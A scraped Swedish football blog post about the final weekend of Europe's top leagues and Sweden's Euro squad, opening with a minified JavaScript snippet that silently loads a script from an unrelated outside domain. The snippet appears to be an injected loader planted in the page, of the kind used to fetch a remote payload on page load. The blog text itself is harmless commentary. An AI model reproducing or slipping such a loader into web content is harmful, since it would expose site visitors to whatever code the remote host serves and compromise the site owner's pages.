;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Avgörandets tid är nu – FMSweden
Meny Stäng

Fabbes blogg: Avgörandets tid är nu

I helgen smäller det på riktigt – avgörandets tid är här.

I 38 omgångar (34 i Tyskland) så har de kämpats och slagits. Överraskningar har blandats med överkörningar, derbyn har spelats och förhoppningar har grusats. Mål har gjorts, och målchanser har missats. Kommentatorer har ropat i munnen på varandra, Liverpool har förlorat och i La Liga har ingen velat vinna. Och snart är allt det här slut – bara sådär.

För nu till helgen är det faktiskt dags att ta den europeiska fotbollen i mål. Alla de stora ligorna har sin avslutande omgång, och faktum är att det faktiskt känns ganska skönt. Personligen har jag haft oerhört svårt att hålla intresset för de stora ligorna uppe nu på slutet, vilket jag ofta har när säsongerna närmar sig sitt avgörande. Den svenska fotbollen har dragit igång, EM väntar och nu väntar man även på att gärsgårdsserierna ska dra igång. Det har gjort att världsfotbollen har fått ta något steg tillbaka på prioriteringslistan. Men med det sagt ska det bli oerhört spännande att följa de sista omgångarna i helgen. I vissa ligor lever guldstriden, i andra får man följa kampen om CL-platserna och i vissa är det nedflyttningsstriden som lockar. Det kommer bli mycket fotboll att följa i helgen kan vi lugnt konstatera.

Själv lär jag dock missa det mesta då jag ska ner till Skåne och stå utanför ett staket och försöka kika in för att se lite av matchen i Elitettan mellan Borgeby och Alingsås. Men det är inte fy skam det heller!


EM-truppen togs ut igår, och det var precis som väntat inga skrällar alls. Jag hade hoppats att det skulle finnas plats för Jesper Karlsson i truppen, men så blev inte fallet. Jag höll även tummarna för att Sebastian Andersson skulle ta den sista anfallsplatsen, men den gick till Jordan Larsson.

Nu börjar istället fullt fokus inför mästerskapet. För att få exta koll rekomenderar jag verkligen Tutto Baluttos uppsnack med ett avsnitt för varje lag. Ett bra sätt att få igång EM-peppen, samtidigt som man får koll på de länderna som man kanske inte ser varje vecka.


Ibland får jag frågan vad jag älskar med svensk fotoboll. Framöver kommer jag bara visa denna filmen, och argumentera för att svensk fotboll har verkligen plats för alla. Omöjligt att inte älska!

Please wait...

Liknande Inlägg

Lämna ett svar